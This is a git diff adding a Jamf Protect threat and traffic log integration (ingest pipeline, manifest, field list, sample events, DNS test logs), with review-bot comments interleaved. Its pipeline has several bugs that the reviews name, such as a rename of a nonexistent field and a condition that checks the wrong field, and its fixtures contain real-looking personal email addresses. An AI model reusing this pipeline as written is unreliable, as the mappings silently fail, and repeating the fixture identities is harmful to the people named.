"2023-12-11T21:50:47.929Z", + "url": 
"https://radar.wandera.com/security/events/detail/bbe5c381-0647-4a01-be29-691e7ed908dd.ACCESS_CRYPTOJACKING_HOST?createdUtcMs=1702331447929" + }, + "host": { + "geo": { + "country_iso_code": "GB" + }, + "hostname": "C02RR5V5G8WN", + "id": "3ab4d0f6-2fea-49d5-96e5-0ead0a910378", + "os": { + "full": "MAC_OS 12.7.1" + } + }, + "observer": { + "product": "Jamf Protect", + "vendor": "Jamf" + }, + "organization": { + "id": "9608556b-0c3a-4a9c-9b4a-d714d8a028a1" + }, + "rule": { + "description": "Risky Host/Domain - Cryptojacking", + "name": "ACCESS_CRYPTOJACKING_HOST" + }, + "user": { + "email": "ab8debf5-38bf-4a71-a7d3-0fca4b6c5a1b@9608556b-0c3a-4a9c-9b4a-d714d8a028a1.wnd", + "name": "76952549-aa61-51f4-9bef-0eaed5484319" + } + } + ] +} \ No newline at end of file diff --git a/packages/jamf_protect/data_stream/web_threat_events/agent/stream/http_endpoint.yml.hbs b/packages/jamf_protect/data_stream/web_threat_events/agent/stream/http_endpoint.yml.hbs new file mode 100644 index 00000000000..030c4a24f77 --- /dev/null +++ b/packages/jamf_protect/data_stream/web_threat_events/agent/stream/http_endpoint.yml.hbs @@ -0,0 +1,38 @@ +listen_address: {{listen_address}} +listen_port: {{listen_port}} +url: {{url}} +{{#if secret_header}} +secret.header: {{secret_header}} +{{/if}} +{{#if secret_value}} +secret.value: {{secret_value}} +{{/if}} +{{#if preserve_original_event}} +preserve_original_event: true +{{/if}} +{{#if preserve_duplicate_custom_fields}} +preserve_duplicate_custom_fields: true +{{/if}} +tags: +{{#if preserve_original_event}} +- preserve_original_event +{{/if}} +{{#if preserve_duplicate_custom_fields}} +- preserve_duplicate_custom_fields +{{/if}} +{{#each tags as |tag|}} +- {{tag}} +{{/each}} +{{#if content_type }} +content_type: {{ content_type }} +{{/if}} +{{#contains "forwarded" tags}} +publisher_pipeline.disable_host: true +{{/contains}} +{{#if ssl}} +ssl: {{ssl}} +{{/if}} +{{#if processors}} +processors: +{{processors}} +{{/if}} \ No newline at end of file 
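Review bot: No expected document carries `rule.id`, although every input event has `eventType.id`; this matches the ingest pipeline in the same commit, whose `rename` names `jamf_protect.threat.event.eventType.id.toString()` as the source field — a literal path that never exists, so with `ignore_missing: true` the processor is a silent no-op. Changing it to `field: jamf_protect.threat.event.eventType.id` (plus a `convert` to `string`, since the first fixture sends the id as an integer and the others as a string) and regenerating this file would make the test assert the intended mapping. The same output shows blocked-host destinations only in `destination.address`, with no `destination.ip` or `related.ip`, so detections keyed on those ECS fields will not match these events; the pipeline hunk runs past the end of this chunk, so this is inferred from the expected output rather than from the processors themselves.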
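Review bot: `listen_address: {{listen_address}}` and `url: {{url}}` are rendered unconditionally, unlike `secret.header`, `secret.value` and `ssl`, which are wrapped in `{{#if}}`; if the stream's manifest (not in this chunk) does not declare `listen_address`, the rendered input config ends up with an empty `listen_address:` value, or fails to render, depending on the templating behaviour. Either guard it the same way, `{{#if listen_address}}listen_address: {{listen_address}}{{/if}}`, or make sure the manifest declares the variable with a default.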
diff --git a/packages/jamf_protect/data_stream/web_threat_events/elasticsearch/ingest_pipeline/default.yml b/packages/jamf_protect/data_stream/web_threat_events/elasticsearch/ingest_pipeline/default.yml
new file mode 100644
index 00000000000..cda2efaabec
--- /dev/null
+++ b/packages/jamf_protect/data_stream/web_threat_events/elasticsearch/ingest_pipeline/default.yml
@@ -0,0 +1,247 @@
+---
+description: Pipeline for parsing Jamf Protect Web Protection threat logs
+processors:
+ - set:
+ field: ecs.version
+ value: '8.11.0'
+ - json:
+ field: message
+ target_field: jamf_protect.threat
+ if: ctx.message != null
+ - rename:
+ field: json
+ target_field: jamf_protect.threat
+ if: ctx.json != null
+
+##########################
+## ECS Observer Mapping ##
+##########################
+ - set:
+ field: observer.product
+ value: Jamf Protect
+ - set:
+ field: observer.vendor
+ value: Jamf
+
+#######################
+## ECS Event Mapping ##
+#######################
+ - set:
+ field: event.kind
+ value: alert
+ - set:
+ field: event.provider
+ value: Jamf Protect
+ - rename:
+ field: jamf_protect.threat.event.timestamp
+ target_field: event.start
+ if: ctx.jamf_protect?.threat?.event?.timestamp != null
+ - append:
+ field: event.category
+ value: host
+ - append:
+ field: event.category
+ value: malware
+ if: ctx.jamf_protect?.threat?.event?.eventType?.name == 'MALWARE'
+ - rename:
+ field: jamf_protect.threat.event.action
+ target_field: event.action
+ ignore_missing: true
+ if: ctx.jamf_protect?.threat?.event?.action != null
+ - set:
+ field: event.reason
+ value: '{{jamf_protect.threat.event.eventType.description}}'
+ if: ctx.jamf_protect?.threat?.event?.eventType?.description != null
+ # ignore_missing: true
+ - rename:
+ field: jamf_protect.threat.event.alertId
+ target_field: event.id
+ ignore_missing: true
+ if: ctx.jamf_protect?.threat?.event?.alertId != null
+ - rename:
+ field: jamf_protect.threat.event.severity
+ target_field: event.severity
+ ignore_missing: true
+ if: ctx.jamf_protect?.threat?.event?.severity != null
+ - rename:
+ field: jamf_protect.threat.event.eventUrl
+ target_field: event.url
+ ignore_missing: true
+ if: ctx.jamf_protect?.threat?.event?.eventUrl != null
+
+
+#######################
+## ECS Rule Mapping ##
+#######################
+ - rename:
+ field: jamf_protect.threat.event.eventType.name
+ target_field: rule.name
+ if: ctx.jamf_protect?.threat?.event?.eventType?.name != null
+ ignore_missing: true
+ - set:
+ field: rule.description
+ value: '{{jamf_protect.threat.event.eventType.description}}'
+ if: ctx.jamf_protect?.threat?.event?.eventType?.description != null
+ # ignore_missing: true
+ - rename:
+ field: jamf_protect.threat.event.eventType.id.toString()
+ target_field: rule.id
+ if: ctx.jamf_protect?.threat?.event?.eventType?.id != null
+ ignore_missing: true
+
+
+#######################
+## ECS Host Mapping ##
+#######################
+ - rename:
+ field: jamf_protect.threat.event.device.userDeviceName
+ target_field: host.hostname
+ ignore_missing: true
+ if: ctx.jamf_protect?.threat?.event?.device?.userDeviceName != null
+ - rename:
+ field: jamf_protect.threat.event.device.deviceName
+ target_field: host.hostname
+ ignore_missing: true
+ if: ctx.jamf_protect?.threat?.event?.device?.deviceName == null && ctx.jamf_protect?.threat?.event?.device?.userDeviceName != null
+ - rename:
+ field: jamf_protect.threat.event.device.deviceId
+ target_field: host.id
+ ignore_missing: true
+ if: ctx.jamf_protect?.threat?.event?.device?.deviceId != null
+ - rename:
+ field: jamf_protect.threat.event.device.os
+ target_field: host.os.full
+ if: ctx.jamf_protect?.threat?.event?.device?.os != null
+ ignore_missing: true
+
+########################
+## ECS User Mapping ##
+########################
+
+ - rename:
+ field: jamf_protect.threat.event.user.name
+ target_field: user.name
+ # ignore_missing: true
+ if: ctx.jamf_protect?.threat?.event?.user?.name != null
+ - rename:
+ field: jamf_protect.threat.event.user.email
+ target_field: user.email
+ # ignore_missing: true
+ if: ctx.jamf_protect?.threat?.event?.user?.email != null
+
+########################
+## ECS GEO Mapping ##
+########################
+ - rename:
+ field: jamf_protect.threat.event.location
+ target_field: host.geo.country_iso_code
+ # ignore_missing: true
+ if: ctx.jamf_protect?.threat?.event?.location != null
+
+
+#######################
+## ECS Destination Mapping ##
+#######################
+ - rename:
+ field: jamf_protect.threat.event.destination.ip
+ target_field: destination.address
+ # ignore_missing: true
+ if: ctx.jamf_protect?.threat?.event?.destination?.ip != null
+ - rename:
+ field: jamf_protect.threat.event.destination.name
+ target_field: destination.domain
+ # ignore_missing: true
+ if: ctx.jamf_protect?.threat?.event?.destination?.name != null
+ - rename:
+ field: jamf_protect.threat.event.destination.port
+ target_field: destination.port
+ # ignore_missing: true
+ if: ctx.jamf_protect?.threat?.event?.destination?.port != null
+
+
+#######################
+## ECS File Mapping ##
+#######################
+ - rename:
+ field: jamf_protect.threat.event.app.name
+ target_field: file.name
+ # ignore_missing: true
+ if: ctx.jamf_protect?.threat?.event?.app?.name != null
+ - rename:
+ field: jamf_protect.threat.event.app.sha1
+ target_field: file.hash.sha1
+ # ignore_missing: true
+ if: ctx.jamf_protect?.threat?.event?.app?.sha1 != null
+ - rename:
+ field: jamf_protect.threat.event.app.sha256
+ target_field: file.hash.sha256
+ # ignore_missing: true
+ if: ctx.jamf_protect?.threat?.event?.app?.sha256 != null
+
+#######################
+## ECS Source Mapping ##
+#######################
+ - rename:
+ field: jamf_protect.threat.event.source.ip
+ target_field: source.address
+ # ignore_missing: true
+ if: ctx.jamf_protect?.threat?.event?.destination?.ip != null
+ - rename:
+ field: jamf_protect.threat.event.source.port
+ target_field: source.port
+ # ignore_missing: true
+ if: ctx.jamf_protect?.threat?.event?.source?.port != null
+
+# ########################
+# # ECS Organization Mapping ##
+# ########################
+ - rename:
+ field: jamf_protect.threat.event.account.customerId
+ target_field: organization.id
+ ignore_missing: true
+ if: ctx.jamf_protect?.threat?.event?.account?.customerId != null
+
+
+
+########################
+# ECS Related Mapping ##
+########################
+
+
+#############
+## Cleanup ##
+#############
+ - remove:
+ field:
+ - jamf_protect.threat
+ - jamf_protect
+ - message
+ ignore_missing: true
+ - remove:
+ field: event.original
+ if: ctx.tags == null || !(ctx.tags.contains('preserve_original_event'))
+ ignore_failure: true
+ - script:
+ description: Drops null/empty values recursively.
+ lang: painless
+ source:
+ boolean dropEmptyFields(Object object) {
+ if (object == null || object == '') {
+ return true;
+ } else if (object instanceof Map) {
+ ((Map) object).values().removeIf(value -> dropEmptyFields(value));
+ return (((Map) object).size() == 0);
+ } else if (object instanceof List) {
+ ((List) object).removeIf(value -> dropEmptyFields(value));
+ return (((List) object).length == 0);
+ }
+ return false;
+ }
+ dropEmptyFields(ctx);
+on_failure:
+ - set:
+ field: event.kind
+ value: pipeline_error
+ - append:
+ field: error.message
+ value: '{{{ _ingest.on_failure_message }}}'
\ No newline at end of file
diff --git a/packages/jamf_protect/data_stream/web_threat_events/fields/base-fields.yml b/packages/jamf_protect/data_stream/web_threat_events/fields/base-fields.yml
new file mode 100644
index 00000000000..9d98b4b0c22
--- /dev/null
+++ b/packages/jamf_protect/data_stream/web_threat_events/fields/base-fields.yml
@@ -0,0 +1,20 @@
+- name: data_stream.type
+ type: constant_keyword
+ description: Data stream type.
+- name: data_stream.dataset
+ type: constant_keyword
+ description: Data stream dataset.
+- name: data_stream.namespace
+ type: constant_keyword
+ description: Data stream namespace.
+- name: '@timestamp'
+ type: date
+ description: Event timestamp.
+- name: event.dataset
+ type: constant_keyword
+ description: Name of the dataset.
+ value: jamf_protect.web-threat-events
+- name: event.module
+ type: constant_keyword
+ description: Event module.
+ value: jamf_protect
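Review bot: The `source.address` rename in the ECS Source Mapping section is gated on `if: ctx.jamf_protect?.threat?.event?.destination?.ip != null` instead of the source field, and because the Destination Mapping rename earlier in the pipeline has already moved `destination.ip` away, that condition is false by the time it is evaluated and `source.address` is never produced (the `sample_event.json` in this commit shows `source` with only `port` although the raw message carries `source.ip`). It should read `if: ctx.jamf_protect?.threat?.event?.source?.ip != null`. Two other renames in this hunk are dead as written: `field: jamf_protect.threat.event.eventType.id.toString()` names a literal field that does not exist, so `rule.id` is never set (rename `jamf_protect.threat.event.eventType.id` and follow it with a `convert` processor to `string`), and the `deviceName` fallback for `host.hostname` is conditioned on `deviceName == null && userDeviceName != null`, the inverse of the case it is meant to cover. The `ECS Related Mapping` section is empty, so `related.ip`, `related.hosts`, `related.hash` and `related.user` declared in `fields/ecs.yml` are never populated, and those are the fields detection rules pivot on.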
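Review bot: `event.dataset` is declared as a `constant_keyword` with `value: jamf_protect.web-threat-events`, but the data stream directory is `web_threat_events`; if, as is usual in this repository, the dataset the agent stamps on each document is derived from that directory name (`jamf_protect.web_threat_events`), every document will carry a value different from the constant and be rejected at index time. The value should be `value: jamf_protect.web_threat_events`. The hyphenated form appears elsewhere in this commit only as the default tag `jamf_protect-web-threat-events` in `manifest.yml`, which is a tag, not a dataset name.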
diff --git a/packages/jamf_protect/data_stream/web_threat_events/fields/ecs.yml b/packages/jamf_protect/data_stream/web_threat_events/fields/ecs.yml
new file mode 100644
index 00000000000..ebc871aa483
--- /dev/null
+++ b/packages/jamf_protect/data_stream/web_threat_events/fields/ecs.yml
@@ -0,0 +1,284 @@ +- external: ecs + name: ecs.version +- external: ecs + name: error.message +- external: ecs + name: event.action +- external: ecs + name: event.created +- external: ecs + name: event.code +- external: ecs + name: event.ingested +- external: ecs + name: event.kind +- external: ecs + name: event.original +- external: ecs + name: event.outcome +- external: ecs + name: event.severity +- external: ecs + name: event.start +- external: ecs + name: event.category +- external: ecs + name: event.id +- external: ecs + name: event.timezone +- external: ecs + name: related.ip +- external: ecs + name: related.user +- external: ecs + name: user.name +- external: ecs + name: user.domain +- external: ecs + name: user.email +- external: ecs + name: related.hosts +- external: ecs + name: related.hash +- external: ecs + name: process.args +- external: ecs + name: process.args_count +- external: ecs + name: process.command_line +- external: ecs + name: process.executable +- external: ecs + name: process.parent.pid +- external: ecs + name: process.real_group.id +- external: ecs + name: process.real_user.id +- external: ecs + name: process.user.id +- external: ecs + name: process.tty +- external: ecs + name: process.group_leader.pid +- external: ecs + name: process.exit_code +- external: ecs + name: process.executable +- external: ecs + name: process.name +- external: ecs + name: process.pid +- external: ecs + name: process.hash.md5 +- external: ecs + name: process.hash.sha1 +- external: ecs + name: process.hash.sha256 +- external: ecs + name: process.code_signature.signing_id +- external: ecs + name: process.code_signature.status +- external: ecs + name: process.code_signature.team_id +- external: ecs + name: file.hash.md5 +- external: ecs + name: file.hash.sha1 +- external: ecs + name: file.hash.sha256 +- external: ecs + name: file.name +- external: ecs + name: file.path +- external: ecs + name: file.gid +- external: ecs + name: file.inode +- external: ecs + name: 
file.mode +- external: ecs + name: file.size +- external: ecs + name: file.uid +- external: ecs + name: file.code_signature.signing_id +- external: ecs + name: file.code_signature.status +- external: ecs + name: file.code_signature.team_id +- external: ecs + name: destination.address +- external: ecs + name: destination.as.number +- external: ecs + name: destination.as.organization.name +- external: ecs + name: destination.domain +- external: ecs + name: destination.geo.continent_name +- external: ecs + name: destination.geo.country_iso_code +- external: ecs + name: destination.geo.city_name +- external: ecs + name: destination.geo.country_name +- external: ecs + name: destination.geo.location +- external: ecs + name: destination.ip +- external: ecs + name: destination.port +- external: ecs + name: network.direction +- external: ecs + name: network.transport +- external: ecs + name: source.domain +- external: ecs + name: source.ip +- external: ecs + name: source.port +- external: ecs + name: tags +- external: ecs + name: threat.tactic.id +- external: ecs + name: threat.tactic.reference +- external: ecs + name: threat.tactic.name +- external: ecs + name: threat.technique.id +- external: ecs + name: threat.technique.name +- external: ecs + name: threat.technique.reference +- external: ecs + name: threat.enrichments +- external: ecs + name: threat.software.platforms +- external: ecs + name: container.image.tag +- external: ecs + name: container.runtime +- external: ecs + name: ecs.version +- external: ecs + name: error.message +- external: ecs + name: event.action +- external: ecs + name: event.category +- external: ecs + name: event.created +- external: ecs + name: event.duration +- external: ecs + name: event.end +- external: ecs + name: event.id +- external: ecs + name: event.ingested +- external: ecs + name: event.kind +- external: ecs + name: event.provider +- external: ecs + name: event.severity +- external: ecs + name: event.start +- external: ecs + name: 
event.type +- external: ecs + name: file.extension +- external: ecs + name: file.hash.md5 +- external: ecs + name: file.hash.sha1 +- external: ecs + name: file.hash.sha256 +- external: ecs + name: file.hash.sha512 +- external: ecs + name: file.name +- external: ecs + name: file.path +- external: ecs + name: log.file.path +- external: ecs + name: log.logger +- external: ecs + name: message +- external: ecs + name: observer.name +- external: ecs + name: observer.product +- external: ecs + name: observer.type +- external: ecs + name: observer.vendor +- external: ecs + name: process.command_line +- external: ecs + name: process.parent.pid +- external: ecs + name: process.parent.start +- external: ecs + name: process.pid +- external: ecs + name: process.start +- external: ecs + name: related.hash +- external: ecs + name: related.hosts +- external: ecs + name: related.ip +- external: ecs + name: related.user +- external: ecs + name: rule.description +- external: ecs + name: rule.name +- external: ecs + name: rule.id +- external: ecs + name: tags +- external: ecs + name: threat.framework +- external: ecs + name: threat.technique.name +- external: ecs + name: user.domain +- external: ecs + name: user.id +- external: ecs + name: user.name +- external: ecs + name: group.id +- external: ecs + name: host.geo.country_iso_code +- external: ecs + name: group.name +- name: volume.file_system_type + type: keyword +- name: volume.bus_type + type: keyword +- name: volume.nt_name + type: keyword +- name: volume.product_id + type: keyword +- name: volume.product_name + type: keyword +- name: volume.removable + type: boolean +- name: volume.serial_number + type: keyword +- name: volume.size + type: long +- name: volume.vendor_id + type: keyword +- name: volume.vendor_name + type: keyword +- name: volume.writable + type: boolean +- name: organization.id + type: keyword 
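Review bot: The declaration list is padded with duplicates and with fields this data stream never emits: `ecs.version`, `error.message`, `event.action`, `event.category`, `event.created`, `event.id`, `event.ingested`, `event.kind`, `event.severity`, `event.start`, `file.hash.md5`/`sha1`/`sha256`, `file.name`, `file.path`, `process.command_line`, `process.parent.pid`, `process.pid`, `process.executable`, `related.hash`/`hosts`/`ip`/`user`, `tags`, `threat.technique.name`, `user.domain` and `user.name` each appear twice, and the whole `process.*`, `container.*`, `threat.*`, `network.*`, `destination.geo.*`, `destination.as.*`, `log.*` and `volume.*` groups have no corresponding processor in the threat pipeline of this commit. Trimming the file to what the pipeline actually produces (`observer.*`, `event.*`, `rule.*`, `host.*`, `user.*`, `destination.*`, `file.*`, `source.*`, `organization.id`, `error.message`, `tags`, `message`, and `related.*` once those are populated) keeps the mapping reviewable and stops unrelated data being indexed under ECS names by accident. The `volume.*` entries are custom, non-ECS fields and belong in `fields/fields.yml` if they are needed at all.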
diff --git a/packages/jamf_protect/data_stream/web_threat_events/manifest.yml b/packages/jamf_protect/data_stream/web_threat_events/manifest.yml
new file mode 100644
index 00000000000..71a602f8469
--- /dev/null
+++ b/packages/jamf_protect/data_stream/web_threat_events/manifest.yml
@@ -0,0 +1,66 @@
+title: Receives Web Threat Events from Jamf Protect with Elastic Agent.
+type: logs
+streams:
+ - input: http_endpoint
+ template_path: http_endpoint.yml.hbs
+ title: Jamf Protect Web Threat Events
+ description: Receives Web Threat Events from Jamf Protect with Elastic Agent.
+ vars:
+ - name: listen_port
+ type: integer
+ title: Listen Port
+ description: The port number the listener binds to.
+ multi: false
+ required: true
+ show_user: true
+ default: 9552
+ - name: url
+ type: text
+ title: URL
+ description: This option specifies which URL path to accept requests on. Defaults to /.
+ multi: false
+ required: false
+ show_user: false
+ default: /
+ - name: tags
+ type: text
+ title: Tags
+ multi: true
+ required: true
+ show_user: false
+ default:
+ - forwarded
+ - jamf_protect-web-threat-events
+ - name: preserve_original_event
+ required: true
+ show_user: true
+ title: Preserve original event
+ description: Preserves a raw copy of the original event, added to the field `event.original`.
+ type: bool
+ multi: false
+ default: false
+ - name: preserve_duplicate_custom_fields
+ required: true
+ show_user: true
+ title: Preserve duplicate custom fields
+ description: Preserve custom fields for all ECS mappings.
+ type: bool
+ multi: false
+ default: false
+ - name: processors
+ type: yaml
+ title: Processors
+ multi: false
+ required: false
+ show_user: false
+ description: >-
+ Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details.
+ - name: content_type
+ type: text
+ title: Content types
+ multi: false
+ default:
+ - application/json;charset=UTF-8
+ required: true
+ show_user: true
+ description: By default the input expects the incoming POST to include a Content-Type of application/json to try to enforce the incoming data to be valid JSON. In certain scenarios when the source of the request is not able to do that, it can be overwritten with another value or set to null.
diff --git a/packages/jamf_protect/data_stream/web_threat_events/sample_event.json b/packages/jamf_protect/data_stream/web_threat_events/sample_event.json
new file mode 100644
index 00000000000..44ac710863f
--- /dev/null
+++ b/packages/jamf_protect/data_stream/web_threat_events/sample_event.json
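Review bot: The stream template `http_endpoint.yml.hbs` added in this commit renders `listen_address`, `secret.header`, `secret.value` and `ssl`, yet this manifest declares none of `listen_address`, `secret_header`, `secret_value` or `ssl`; unless they are defined at the package-level manifest, which is outside this diff, `listen_address` renders empty and the listener on port 9552 accepts unauthenticated plaintext POSTs from any host that can reach it, so fabricated threat alerts could be fed into the SIEM. If these are deliberately package-level, a comment such as `# listen_address, secret_header, secret_value and ssl are declared at package level` on the `vars:` block would make that visible to reviewers; otherwise add them here with `secret_header`/`secret_value` marked `secret: true`. Separately, `content_type` is `type: text` with `multi: false` but its `default` is a YAML list (`- application/json;charset=UTF-8`); a scalar `default: application/json;charset=UTF-8` matches the declared shape.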
@@ -0,0 +1,61 @@ +{ + "destination": { + "address": "ip", + "domain": "host", + "port": 80 + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "Detected", + "category": [ + "host" + ], + "id": "013b15c9-8f62-4bf1-948a-d82367af2a10", + "kind": "alert", + "module": "jamf_protect", + "provider": "Jamf Protect", + "reason": "Sideloaded App", + "severity": 6, + "start": "2020-01-30T17:47:41.767Z", + "url": "https://radar.wandera.com/security/events/detail/013b15c9-8f62-4bf1-948a-d82367af2a10.SIDE_LOADED_APP_IN_INVENTORY?createdUtcMs=1580406461767" + }, + "file": { + "hash": { + "sha1": "16336078972773bc6c8cef69d722c8c093ba727ddc5bb31eb2", + "sha256": "16336078978a306dc23b67dae9df18bc2a0205e3ff0cbf97c46e76fd670f93fd142d7042" + }, + "name": "Books" + }, + "host": { + "geo": { + "country_iso_code": "gb" + }, + "hostname": "Apple iPhone 11", + "id": "09f81436-de17-441e-a631-0461252c629b", + "os": { + "full": "IOS 11.2.5" + } + }, + "jamf_protect": {}, + "message": "{\"event\":{\"metadata\":{\"schemaVersion\":\"1.0\",\"vendor\":\"Jamf\",\"product\":\"Threat Events Stream\"},\"timestamp\":\"2020-01-30T17:47:41.767Z\",\"alertId\":\"013b15c9-8f62-4bf1-948a-d82367af2a10\",\"account\":{\"customerId\":\"fb4567b6-4ee2-3c4c-abb9-4c78ec463b25\",\"parentId\":\"7c302632-7ac4-4234-8ada-11d76feb3730\",\"name\":\"Customer\"},\"device\":{\"deviceId\":\"09f81436-de17-441e-a631-0461252c629b\",\"os\":\"IOS 11.2.5\",\"deviceName\":\"Apple iPhone 11 (11.2.5)\",\"userDeviceName\":\"Apple iPhone 11\",\"externalId\":\"5087dc0e-876c-4b0e-95ea-5b543476e0c4\"},\"eventType\":{\"id\":213,\"description\":\"Sideloaded 
App\",\"name\":\"SIDE_LOADED_APP_IN_INVENTORY\"},\"app\":{\"id\":\"com.apple.iBooks\",\"name\":\"Books\",\"version\":\"1.1\",\"sha1\":\"16336078972773bc6c8cef69d722c8c093ba727ddc5bb31eb2\",\"sha256\":\"16336078978a306dc23b67dae9df18bc2a0205e3ff0cbf97c46e76fd670f93fd142d7042\"},\"destination\":{\"name\":\"host\",\"ip\":\"ip\",\"port\":80},\"source\":{\"ip\":\"1.2.3.4\",\"port\":3025},\"location\":\"gb\",\"accessPoint\":\"AccessPoint\",\"accessPointBssid\":\"c6:9f:db:b1:73:5a\",\"severity\":6,\"user\":{\"email\":\"user@mail.com\",\"name\":\"John Doe\"},\"eventUrl\":\"https://radar.wandera.com/security/events/detail/013b15c9-8f62-4bf1-948a-d82367af2a10.SIDE_LOADED_APP_IN_INVENTORY?createdUtcMs=1580406461767\",\"action\":\"Detected\"}}", + "observer": { + "product": "Jamf Protect", + "vendor": "Jamf" + }, + "organization": { + "id": "fb4567b6-4ee2-3c4c-abb9-4c78ec463b25" + }, + "rule": { + "description": "Sideloaded App", + "name": "SIDE_LOADED_APP_IN_INVENTORY" + }, + "source": { + "port": 3025 + }, + "user": { + "email": "user@mail.com", + "name": "John Doe" + } +} \ No newline at end of file diff --git a/packages/jamf_protect/data_stream/web_traffic_events/_dev/test/pipeline/test-jamf-protect-traffic-sample-logs.log b/packages/jamf_protect/data_stream/web_traffic_events/_dev/test/pipeline/test-jamf-protect-traffic-sample-logs.log new file mode 100644 index 00000000000..6ee4ff93cc1 --- /dev/null +++ b/packages/jamf_protect/data_stream/web_traffic_events/_dev/test/pipeline/test-jamf-protect-traffic-sample-logs.log 
@@ -0,0 +1,6 @@ +{"event":{"signatureId":{"id":"3","name":"DNS Lookup"},"metadata":{"schemaVersion":"1.0","vendor":"Jamf","product":"Network Traffic Stream"},"timestamp":"2024-02-02T06:26:04.273Z","account":{"customerId":"9608556b-0c3a-4a9c-9b4a-d714d8a028a1","parentId":"c00a8916-5bad-406e-8ee7-b125460ecaf3"},"device":{"deviceId":"3453be41-0f2d-4d43-9ec2-a53f39fff93c","osType":"IOS"},"destination":{"ips":[]},"source":{"ip":"107.10.9.64"},"networkInterface":"WIFI","domain":"youtube","tld":"com","hostName":"s.youtube.com","threat":{"result":"CLEAN","types":[]},"dns":{"recordType":"HTTPS","responseStatus":"NOERROR","ttl":101,"category":"Custom"},"blocked":false,"receiptTime":1706855164273,"user":{"email":"hjilling@icloud.com","name":"07a5a2ae-16de-4767-831e-0ea8b7c3abe4"}}} +{"event":{"signatureId":{"id":"3","name":"DNS Lookup"},"metadata":{"schemaVersion":"1.0","vendor":"Jamf","product":"Network Traffic Stream"},"timestamp":"2024-02-02T06:29:12.031Z","account":{"customerId":"777a7e56-e0ae-4bb9-ac2c-47015dcd2c68","parentId":"c00a8916-5bad-406e-8ee7-b125460ecaf3"},"device":{"deviceId":"c0dd2643-ae93-43a9-bc71-6d93555c1f54","osType":""},"destination":{"ips":[]},"source":{"ip":"24.209.152.211"},"domain":"microsoft","tld":"com","hostName":"edge.microsoft.com","threat":{"result":"CLEAN","types":[]},"dns":{"recordType":"HTTPS","responseStatus":"NOERROR","ttl":144,"category":"Custom"},"blocked":false,"receiptTime":1706855352031,"user":{"email":"","name":""}}} +{"event":{"signatureId":{"id":"3","name":"DNS Lookup"},"metadata":{"schemaVersion":"1.0","vendor":"Jamf","product":"Network Traffic 
Stream"},"timestamp":"2024-01-25T02:20:05.709Z","account":{"customerId":"777a7e56-e0ae-4bb9-ac2c-47015dcd2c68","parentId":"c00a8916-5bad-406e-8ee7-b125460ecaf3"},"device":{"deviceId":"b57306b5-69f8-4e24-a269-466753e39cc1","osType":"MAC_OS","externalId":"081de2ca-9228-56d0-ad00-bf11afa67710"},"destination":{"ips":[]},"domain":"trafficmanager","tld":"net","hostName":"presence.services.sfb.trafficmanager.net","threat":{"result":"CLEAN","types":[]},"dns":{"recordType":"HTTPS","responseStatus":"NOERROR","ttl":0,"category":"Productivity"},"blocked":false,"receiptTime":1706149205709,"user":{"email":"matthew.ward@jamf.com","name":"Matthew Ward"}}} +{"event":{"signatureId":{"id":"3","name":"DNS Lookup"},"metadata":{"schemaVersion":"1.0","vendor":"Jamf","product":"Network Traffic Stream"},"timestamp":"2024-01-25T02:30:47.470Z","account":{"customerId":"777a7e56-e0ae-4bb9-ac2c-47015dcd2c68","parentId":"c00a8916-5bad-406e-8ee7-b125460ecaf3"},"device":{"deviceId":"b57306b5-69f8-4e24-a269-466753e39cc1","osType":"MAC_OS","externalId":"081de2ca-9228-56d0-ad00-bf11afa67710"},"destination":{"ips":["2620:149:a41:880::2:7"]},"domain":"icloud","tld":"com","hostName":"p25-content.icloud.com","threat":{"result":"CLEAN","types":[]},"dns":{"recordType":"AAAA","responseStatus":"NOERROR","ttl":36,"category":"Cloud & File Storage"},"blocked":false,"receiptTime":1706149847470,"user":{"email":"matthew.ward@jamf.com","name":"Matthew Ward"}}} +{"event":{"signatureId":{"id":"3","name":"DNS Lookup"},"metadata":{"schemaVersion":"1.0","vendor":"Jamf","product":"Network Traffic 
Stream"},"timestamp":"2024-01-24T20:18:55.235Z","account":{"customerId":"777a7e56-e0ae-4bb9-ac2c-47015dcd2c68","parentId":"c00a8916-5bad-406e-8ee7-b125460ecaf3"},"device":{"deviceId":"b57306b5-69f8-4e24-a269-466753e39cc1","osType":"MAC_OS","externalId":"081de2ca-9228-56d0-ad00-bf11afa67710"},"destination":{"ips":["64.20.34.139"]},"domain":"crowdexpert","tld":"org","hostName":"crowdexpert.org","threat":{"result":"DIRTY","types":["malware"]},"dns":{"recordType":"A","responseStatus":"NOERROR","ttl":10,"category":"Uncategorized"},"blocked":true,"receiptTime":1706127535235,"user":{"email":"matthew.ward@jamf.com","name":"Matthew Ward"}}} +{"event":{"signatureId":{"id":"3","name":"DNS Lookup"},"metadata":{"schemaVersion":"1.0","vendor":"Jamf","product":"Network Traffic Stream"},"timestamp":"2024-01-12T03:51:47.216Z","account":{"customerId":"9608556b-0c3a-4a9c-9b4a-d714d8a028a1","parentId":"c00a8916-5bad-406e-8ee7-b125460ecaf3"},"device":{"deviceId":"cd531c8a-26ed-419a-8fd4-f67702f40ad5","osType":"IOS"},"destination":{"ips":[]},"source":{"ip":"107.10.7.168"},"networkInterface":"WIFI","domain":"bidagy","tld":"com","hostName":"sli.bidagy.com","threat":{"result":"DIRTY","types":["malware"]},"dns":{"recordType":"HTTPS","responseStatus":"NOERROR","ttl":0},"blocked":true,"receiptTime":1705031507216,"user":{"email":"hjilling@icloud.com","name":"07a5a2ae-16de-4767-831e-0ea8b7c3abe4"}}} \ No newline at end of file diff --git a/packages/jamf_protect/data_stream/web_traffic_events/_dev/test/pipeline/test-jamf-protect-traffic-sample-logs.log-expected.json b/packages/jamf_protect/data_stream/web_traffic_events/_dev/test/pipeline/test-jamf-protect-traffic-sample-logs.log-expected.json new file mode 100644 index 00000000000..5302187101f --- /dev/null +++ b/packages/jamf_protect/data_stream/web_traffic_events/_dev/test/pipeline/test-jamf-protect-traffic-sample-logs.log-expected.json 
